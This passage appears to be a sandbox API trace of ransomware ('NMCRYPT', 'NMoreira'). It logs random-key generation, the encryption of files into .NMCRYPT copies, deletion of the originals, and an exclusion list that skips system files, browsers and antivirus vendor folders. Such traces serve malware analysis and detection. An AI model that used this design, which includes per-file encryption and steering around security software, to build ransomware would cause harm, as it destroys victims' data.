out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.373] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.374] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.374] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.374] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0162.374] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0162.374] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0162.374] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad138) returned 1 [0162.374] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0162.374] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0162.374] wcslen (_String="\\\\?\\") returned 0x4 [0162.374] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad4f8) returned 1 [0162.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0162.375] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0162.375] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=255) returned 1 [0162.375] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0162.376] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xff, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xff, lpOverlapped=0x0) returned 1 [0162.376] CryptEncrypt (in: hKey=0x9ad4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xff, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0162.376] GetLastError () returned 0x0 [0162.376] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0162.481] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0162.481] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0162.481] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0x20 [0162.481] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm", dwFileAttributes=0x20) returned 0 [0162.481] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned 1 [0162.481] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm")) returned 0 [0162.482] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" [0162.482] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0162.482] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEE0D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxee0d.tmp")) returned 0xee0d [0162.483] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\bears.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEE0D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxee0d.tmp"), dwFlags=0x1) returned 0 [0162.483] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXEE0D.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxee0d.tmp")) returned 1 [0162.483] CryptDestroyKey (hKey=0x9ad4f8) returned 1 [0162.483] wcslen (_String="OK") returned 0x2 [0162.483] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.483] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0162.483] CryptDestroyKey (hKey=0x9ad138) returned 1 [0162.483] CryptDestroyHash (hHash=0x9ad738) returned 1 [0162.483] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0162.483] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0162.483] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*NMCRYPT") returned 0 [0162.483] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*Recovers your files.html") returned 0 [0162.483] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*.exe") returned 0 [0162.483] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*.dll") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*.lnk") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*.bat") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*.ini") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*.msi") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*.scf") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*pagefile.sys*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*AppData*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\winrar\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\java\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\windows\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\ESET\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\AVG\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*Atheros*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*Realtek*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*bootmgr*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*boot*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*boot*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*IO.SYS*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*ntldr*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*chrome*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*opera*") returned 0 [0162.484] PathMatchSpecW (pszFile="Bears.jpg", pszSpec="*firefox*") returned 0 [0162.484] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Bears.jpg", pszSpec="*") returned 1 [0162.484] strlen (_Str="NMoreira") returned 0x8 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.484] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.485] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0162.486] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) 